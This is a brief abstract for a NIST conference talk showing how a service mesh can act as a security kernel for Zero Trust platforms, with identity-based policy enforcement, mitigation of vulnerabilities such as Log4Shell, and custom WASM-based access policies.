In this talk given at the
Zero Trust Architecture and DevSecOps for Cloud-Native Applications
conference held at NIST, I am demonstrating how a Service Mesh can be used as a Security
Kernel to implement Zero Trust platforms. We will see how we can leverage distributed enforcement points to apply policy on the user identity, how to enforce runtime identity as well, and how application targetted policies can be created to quickly mitigate vulnerabilities like the Log4Shell one.
The demo also shows the development of custom WASM-based policies that can leverage the entire feature set of the programming language of choice to build rich access policies that can be enforced by the mesh.